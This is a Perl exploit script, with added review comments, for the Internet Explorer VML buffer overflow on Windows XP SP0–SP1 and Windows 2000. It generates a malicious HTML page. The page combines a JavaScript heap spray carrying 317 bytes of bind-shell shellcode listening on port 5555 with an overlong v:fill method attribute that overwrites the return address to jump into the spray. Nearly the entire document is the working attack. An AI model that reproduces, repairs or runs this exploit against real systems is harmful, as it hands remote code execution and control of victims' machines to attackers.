# Title : MS Internet Explorer (VML) Remote Buffer Overflow Exploit (XP SP1)
# Published : 2006-09-21
# Author : Trirat Puttaraksa
#!/usr/bin/perl
#
# Microsoft Internet Explorer VML Remote Buffer Overflow (Windows XP SP0-SP1 +
# Windows 2000 SP4)
#
# Author: Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>
#
# http://sf-freedom.blogspot.com
#
# For educational purposes only
#
# Note: This exploit is modified from Shirkdog's PoC
# (http://www.milw0rm.com/exploits/2400)
#
# I exploit this stack-based buffer overflow differently from the original PoC
# because of a problem with the shellcode. I use a heap-spraying technique to
# place my shellcode in the heap; since I control EIP, I redirect it into the
# sprayed heap region that contains the shellcode ^-^
#
# This exploit tested on: Windows XP SP1 + IE6 SP1
# Windows XP SP0 + IE6
# Windows 2000 SP4 + IE6 SP1
# Windows 2000 SP4 + IE6
#
# I will describe more implementation details on my blog this weekend :)
#
# P.S. Because of the buffer overflow protection mechanism in Windows XP SP2,
# this exploit does not succeed there. The situation where the overwrite reaches
# the location that EAX points to does not occur, so I cannot use my
# "Fake Cookie" technique, which I used to defeat the buffer overflow protection
# on Windows Server 2003 SP0, to bypass it. If anybody can break this protection
# with some other technique, please share the information :)
#
use strict;
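# Payload: Metasploit win32_bind with LPORT = 5555, i.e. a bind shell that
# listens on TCP port 5555 of the victim (the port appears below as the
# big-endian word 0x15b3). 317 raw bytes; convert_shellcode() %u-encodes them
# for the JavaScript heap spray, so they are kept as raw bytes here.
#
# NOTE(review): the archived listing had lost its backslashes ("xfc" instead
# of "\xfc"), which would have made this a plain ASCII string rather than
# machine code; the "\x" escapes are restored here.
my $shellcode =
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49".
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d".
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66".
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61".
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40".
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32".
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6".
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09".
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0".
"\x66\x68\x15\xb3\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff".
"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53".
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff".
"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64".
"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89".
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab".
"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51".
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53".
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6".
"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0";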
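# JavaScript heap spray embedded in the page head. It builds 350 strings,
# each a NOP (0x90) sled grown until sled + shellcode is about 0x40000
# UTF-16 code units, with the %u-encoded shellcode appended; the intent is
# that the overwritten return address (0x0d0d0d0d, set further down) lands
# inside one of the sleds and slides into the shellcode. headersize = 20 is
# presumably an allowance for the JS string object header (not verified here).
#
# NOTE(review): the archived listing had dropped the backslashes of "\n" and
# \"; they are restored here so the emitted HTML is well-formed.
my $jscript =
"<script>\n" .
"shellcode = unescape(\"" . convert_shellcode($shellcode) . "\");\n" .
"bigblock = unescape(\"%u9090%u9090\");\n" .
"headersize = 20;\n" .
"slackspace = headersize+shellcode.length;\n" .
"while (bigblock.length<slackspace) bigblock+=bigblock;\n" .
"fillblock = bigblock.substring(0, slackspace);\n" .
"block = bigblock.substring(0, bigblock.length-slackspace);\n" .
"while(block.length+slackspace<0x40000) block = block+block+fillblock;\n" .
"memory = new Array();\n" .
"for (i=0;i<350;i++) memory[i] = block + shellcode;\n" .
"</script>";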
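# Page head: declares the VML namespace, loads the VML renderer control by
# CLSID and binds every v:* element to it via a CSS behavior, embeds the
# heap-spray script, then opens the v:rect whose <v:fill> child carries the
# overflowing attribute (see $body1/$body2 below).
#
# NOTE(review): the archived listing had dropped the backslashes before \"
# and in "\n"; they are restored here. The selector is written "v\\:*" so the
# generated CSS contains v\:* as the listing shows.
my $header =
"<html xmlns:v=\"urn:schemas-microsoft-com:vml\">\n" .
"<head>\n" .
"<object id=\"VMLRender\" classid=\"CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E\">\n" .
"</object>\n" .
"<style>\n" .
"v\\:* { behavior: url(#VMLRender); }\n" .
"</style>\n" .
"</head>\n" .
$jscript .
"<body>\n" .
"<v:rect style='width:120pt;height:80pt' fillcolor=\"red\">\n" ;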
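# Trailing markup appended after $body2. $body2 already closes the rect, body
# and html, so these closing tags occur twice in the generated file; kept as in
# the original since they sit after the overflow and only affect the tail.
# (Escapes restored: the archived listing had "n" where "\n" was intended.)
my $footer =
"</v:rect>\n" .
"</body>\n" .
"</html>";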
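# The overflow lives in the `method` attribute of <v:fill>: $body1 opens the
# attribute value, the page assembly below inserts the 256-character filler
# and the four overwrite words, and $body2 closes the value and the rest of
# the element/document.
#
# NOTE(review): the archived listing had dropped the backslashes before \"
# and in "\n"; they are restored here so each fragment is a valid literal.
my $body1 = "<v:fill method=\"" ;
my $body2 =
"\" angle=\"-45\"\n" .
"focus=\"100%\" focusposition=\".5,.5\" focussize=\"0,0\"\n" .
"type=\"gradientRadial\" />\n" .
"</v:rect>\n" .
"</body>\n" .
"</html>";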
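# Assemble the page as UTF-16LE: a byte-order mark, then every ASCII character
# of the markup followed by a NUL. The overflow material is inserted between
# the two halves of the `method` attribute: the filler is written as
# "\x41\x00" code units, while the four overwrite words are appended raw
# (not widened) so they reach the stack as 32-bit values.
#
# NOTE(review): the archived listing had lost its "\x" escapes; they are
# restored here. The file is also now written in binary mode with checked
# open/print/close, so a failed write or a CRLF translation cannot silently
# produce a page whose UTF-16 pairing is off by a byte.
my $page = "\xff\xfe";    # UTF-16LE byte-order mark ("MS Unicode file" magic)

# header + body1: everything up to the opening quote of the method attribute
$page .= join '', map { $_ . "\x00" } split //, ($header . $body1);

# padding + overwrite words (little-endian as written)
$page .= ("\x41\x00" x 256) .    # 256 'A' code units of filler
         "\x01\x0d\x0d\x0d" .    # 0x0d0d0d01: writable memory, per the original author
         "\x44\x44\x44\x44" .    # padding
         "\x0d\x0d\x0d\x0d";     # 0x0d0d0d0d: return address, inside the sprayed sleds

# body2 + footer: close the attribute and the document
$page .= join '', map { $_ . "\x00" } split //, ($body2 . $footer);

open my $out, '>', 'exploit.html' or die "open exploit.html: $!";
binmode $out;    # no newline translation: "\n\x00" pairs must stay intact
print {$out} $page or die "write exploit.html: $!";
close $out or die "close exploit.html: $!";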
# Encode raw bytes as a run of JavaScript "%uXXXX" escapes for unescape().
# Adapted from the JSUnescape() code in Metasploit.
#
#   $data - the raw byte string to encode
#   $mode - 'LE' (default, also used for undef/empty) emits each byte pair
#           as %u<second><first>, so that unescape(), which stores a code
#           unit little-endian, lays the bytes out in their original order;
#           any other value emits %u<first><second>
#
# Returns the encoded string ('' for empty input). A string of odd length has
# its final byte repeated so the last %u group is complete.
sub convert_shellcode {
    my ($data, $mode) = @_;
    $mode ||= 'LE';

    # Odd length: repeat the final byte to complete the last pair.
    $data .= substr($data, -1) if length($data) % 2;

    my @groups;
    for (my $pos = 0; $pos + 1 < length($data); $pos += 2) {
        my $first  = ord substr($data, $pos, 1);
        my $second = ord substr($data, $pos + 1, 1);
        my @order  = ($mode eq 'LE') ? ($second, $first) : ($first, $second);
        push @groups, sprintf('%%u%02x%02x', @order);
    }
    return join '', @groups;
}